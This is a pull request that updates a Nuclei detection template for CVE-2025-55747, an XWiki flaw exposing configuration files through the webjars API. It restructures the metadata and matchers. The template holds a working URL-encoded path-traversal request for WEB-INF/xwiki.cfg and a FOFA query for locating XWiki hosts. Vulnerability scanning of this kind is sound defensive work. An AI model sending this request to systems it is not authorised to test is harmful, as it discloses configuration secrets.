### PR TITLE
Added CVE-2025-55747.yaml

### DIFF
--- a/http/cves/2025/CVE-2025-55747.yaml
+++ b/http/cves/2025/CVE-2025-55747.yaml
@@ -1,11 +1,15 @@
 id: CVE-2025-55747
 
 info:
-  name: XWiki Path Traversal
+  name: XWiki Platform - Information Disclosure
   author: Redmomn
   severity: high
   description: |
-    XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In versions 6.1-milestone-2 through 16.10.6, configuration files are accessible through the webjars API. This is fixed in version 16.10.7.
+    XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In versions 6.1-milestone-2 through 16.10.6, configuration files are accessible through the webjars API.
+  impact: |
+    Remote attackers can access sensitive configuration files, potentially exposing critical information.
+  remediation: |
+    Update to version 16.10.7 or later.
   reference:
     - https://jira.xwiki.org/browse/XWIKI-19350
     - https://nvd.nist.gov/vuln/detail/CVE-2025-55747
@@ -17,20 +21,16 @@ info:
   metadata:
     verified: true
     fofa-query: app="XWIKI-Platform"
-  tags: xwiki,cve2025
+  tags: cve,cve2025,xwiki,lfi
+
 http:
   - method: GET
     path:
       - '{{BaseURL}}/xwiki/webjars/wiki%3Axwiki/..%2F..%2F..%2F..%2F..%2FWEB-INF%2Fxwiki.cfg'
-    matchers-condition: and
+
     matchers:
-      - type: status
-        status:
-          - 200
-      - type: word
-        part: body
+      - type: dsl
+        dsl:
+          - 'contains_all(body, "xwiki.editcomment=","xwiki.plugins=","xwiki.encoding=")'
+          - 'status_code == 200'
         condition: and
-        words:
-          - 'xwiki.editcomment='
-          - 'xwiki.plugins='
-          - 'xwiki.encoding='


### PR DESCRIPTION
Added CVE-2025-55747 entry for XWiki Path Traversal vulnerability.

### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

<img width="1099" height="399" alt="image" src="https://github.com/user-attachments/assets/521bb29c-543b-4273-ad8e-5785fae8fc33" />

<img width="1041" height="650" alt="image" src="https://github.com/user-attachments/assets/f5fe6de8-e5e5-46f6-961e-f074f67eea85" />


### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)